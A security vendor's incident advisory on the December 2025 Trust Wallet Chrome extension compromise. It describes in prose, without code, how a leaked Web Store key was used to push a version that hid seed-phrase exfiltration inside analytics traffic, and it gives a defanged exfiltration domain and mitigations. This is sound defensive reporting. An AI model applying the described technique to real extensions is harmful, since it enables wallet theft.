Executive Summary

On December 24, 2025, a critical security incident affected the Trust Wallet Chrome browser extension, resulting in the theft of approximately $7 million in cryptocurrency assets. The breach was traced to version 2.68 of the extension, which was compromised through the use of a leaked Chrome Web Store API key. This allowed an attacker to bypass Trust Wallet’s internal release process and distribute a malicious update directly to users via the Chrome Web Store. The malicious code exfiltrated users’ mnemonic phrases (seed phrases) to an attacker-controlled server, enabling unauthorized access and theft of funds from hundreds of victims. The incident is limited to Chrome extension users who installed or logged into version 2.68 before December 26, 2025, 11 a.m. UTC. Trust Wallet and its parent company, Binance, have committed to reimbursing affected users and have urged immediate updates to version 2.69. There is no evidence that mobile-only users or other browser extension versions are impacted. The attack highlights the growing risk of supply chain compromises in the cryptocurrency sector and underscores the importance of robust release and credential management processes. All information in this summary is directly supported by the cited sources below.

Technical Information

The attack on the Trust Wallet Chrome extension represents a sophisticated supply chain compromise, exploiting weaknesses in the software deployment process. The attacker obtained a leaked Chrome Web Store API key, which is a credential used by developers to publish and update browser extensions on the Chrome Web Store. By leveraging this key, the attacker was able to upload a malicious version (2.68) of the Trust Wallet extension, bypassing the vendor’s internal manual release checks and controls. This malicious update was published on December 24, 2025, at 12:32 p.m. UTC and was automatically distributed to users via the Chrome Web Store’s update mechanism.

The injected malicious code was embedded within the extension’s analytics logic. Upon installation or login, the code iterated through all wallets stored in the extension and triggered a request for each wallet’s mnemonic phrase. The mnemonic, which is encrypted by default, was decrypted using the password or passkey entered by the user during wallet unlock. Once decrypted, the mnemonic phrase was exfiltrated to an attacker-controlled server at api.metrics-trustwallet[.]com. The domain metrics-trustwallet[.]com was registered on December 8, 2025, and the first exfiltration request was observed on December 21, 2025. The attacker disguised the exfiltration as legitimate analytics traffic by leveraging the open-source posthog-js analytics library, which is commonly used for user behavior tracking. This approach allowed the malicious traffic to blend in with normal extension analytics, reducing the likelihood of immediate detection.

The stolen mnemonics enabled the attacker to reconstruct private keys and drain funds from affected wallets. Blockchain analysis revealed that the attacker stole approximately $3 million in Bitcoin, $431 in Solana, and more than $3 million in Ethereum. The stolen assets were rapidly laundered through centralized exchanges such as ChangeNOW, FixedFloat, and KuCoin, as well as through cross-chain bridges. As of the latest reports, about $2.8 million of the stolen funds remain in the attacker’s wallets, while over $4 million has been moved to exchanges for further laundering and swapping.

The attack chain can be mapped to several MITRE ATT&CK techniques. Initial access was achieved through supply chain compromise (T1195.002), specifically by compromising the software deployment process. Persistence was maintained by using valid deployment credentials (T1078). Credential access was achieved through input capture (T1056) and credentials from password stores (T1555), as the extension decrypted and exfiltrated mnemonics. Data collection was performed by iterating through all stored wallets (T1213), and exfiltration was conducted over web services (T1567.002) using HTTPS POST requests. Command and control was established via application layer protocols (T1071.001), with the attacker’s server acting as the C2 endpoint.

The technical evidence supporting these findings includes the malicious extension artifact (v2.68), the registration and use of the exfiltration domain, the use of posthog-js for data exfiltration, and blockchain transaction analysis by third-party investigators such as SlowMist, PeckShield, and ZachXBT. The attack did not involve a compromised third-party dependency (such as a malicious npm package), but rather direct tampering with the extension’s own codebase.

Attribution remains inconclusive. There is speculation about possible nation-state involvement or an insider threat, given the method of compromise and the use of a stolen API key. However, there is no direct technical evidence linking the attack to a known advanced persistent threat (APT) group or confirming insider involvement. The confidence level for nation-state attribution is low, while the insider threat hypothesis is assessed as medium confidence based on the method but lacking direct evidence.

This incident is consistent with a broader trend of supply chain attacks targeting the cryptocurrency sector, including previous campaigns such as GlassWorm (targeting VS Code extensions) and the FoxyWallet Firefox extension fraud. The use of browser extension supply chain attacks is increasing, as these platforms provide a direct vector to access sensitive user credentials and assets.

Affected Versions & Timeline

The security incident exclusively affects users of the Trust Wallet Chrome extension version 2.68. The malicious version was published to the Chrome Web Store on December 24, 2025, at 12:32 p.m. UTC, following the compromise of the Chrome Web Store API key. The exfiltration domain metrics-trustwallet[.]com was registered on December 8, 2025, and the first observed exfiltration request occurred on December 21, 2025. The attack window is therefore defined as December 24, 2025, 12:32 p.m. UTC (malicious version release) to December 26, 2025, 11 a.m. UTC (public disclosure and update). Only users who installed or logged into the extension during this period are affected. Mobile-only users and users of other browser extension versions are not impacted. The vendor released a fixed version (2.69) and has urged all users to update immediately.

Threat Activity

The threat actor behind this incident demonstrated a high level of sophistication in both the compromise and operational phases of the attack. By obtaining and exploiting a leaked Chrome Web Store API key, the attacker was able to bypass Trust Wallet’s internal release controls and distribute a malicious update directly to end users. The malicious code was carefully crafted to blend in with legitimate analytics logic, leveraging the posthog-js library to disguise exfiltration traffic as normal user behavior tracking. This approach delayed detection and maximized the number of compromised wallets.

Once the mnemonics were exfiltrated, the attacker rapidly drained funds from affected wallets, targeting multiple cryptocurrencies including Bitcoin, Ethereum, and Solana. The stolen assets were laundered through a combination of centralized exchanges and cross-chain bridges, complicating recovery efforts and attribution. Blockchain investigators such as PeckShield and ZachXBT tracked the movement of funds, identifying that approximately $2.8 million remains in the attacker’s wallets, while the remainder has been distributed across various exchanges.

The attack shares technical and operational similarities with previous supply chain attacks in the cryptocurrency sector, such as the GlassWorm campaign and the FoxyWallet Firefox extension fraud. These incidents highlight the increasing use of browser extension supply chain attacks as a vector for credential theft and asset compromise. The use of a stolen deployment credential and direct codebase tampering suggests the attacker had access to internal development or deployment infrastructure, raising the possibility of insider involvement or a highly capable external actor.

There is no confirmed attribution to a specific threat actor or group. While some industry figures have speculated about nation-state involvement or insider threat, there is no direct technical evidence to support these claims. The attack methodology is consistent with both sophisticated cybercriminal and advanced persistent threat (APT) operations, but the available evidence does not allow for high-confidence attribution.

Mitigation & Workarounds

The following mitigation actions are prioritized by severity:

Critical: All users of the Trust Wallet Chrome extension must immediately update to version 2.69 or later. The malicious version 2.68 should be uninstalled, and users should avoid interacting with any messages or forms not originating from official Trust Wallet channels. Users who installed or logged into version 2.68 between December 24, 2025, and December 26, 2025, 11 a.m. UTC should assume their mnemonic phrase has been compromised and should transfer assets to a new wallet generated with a new seed phrase.

High: Affected users should complete the compensation form provided by Trust Wallet at trustwallet-support.freshdesk[.]com, supplying the required information (contact email, country of residence, compromised wallet address, destination address, and transaction hashes) to initiate the reimbursement process. Users should remain vigilant for phishing attempts, including fake compensation forms, impersonated support accounts, and unsolicited direct messages.

Medium: Organizations and individuals using browser-based cryptocurrency wallets should review and strengthen their software supply chain security practices. This includes securing deployment credentials, implementing multi-factor authentication for release processes, and conducting regular code audits and integrity checks.

Low: Users should monitor official Trust Wallet and Binance communication channels for updates and advisories. It is recommended to avoid using browser extensions for high-value cryptocurrency storage and to consider hardware wallets or mobile-only solutions for enhanced security.

References

https://thehackernews.com/2025/12/trust-wallet-chrome-extension-bug.html

https://www.coindesk.com/business/2025/12/26/trust-wallet-users-lose-more-than-usd7-million-to-hacked-chrome-extension

https://fluidattacks.com/blog/glassworm-vs-code-extensions-supply-chain-attack

https://www.mishcon.com/news/firefox-cryptocurrency-extension-fraud-campaign

About Rescana

Rescana provides a Third-Party Risk Management (TPRM) platform designed to help organizations identify, assess, and monitor risks in their software supply chain and vendor ecosystem. Our platform enables continuous monitoring of third-party software components, detection of credential exposures, and assessment of supply chain vulnerabilities. For questions or further information, please contact us at ops@rescana.com.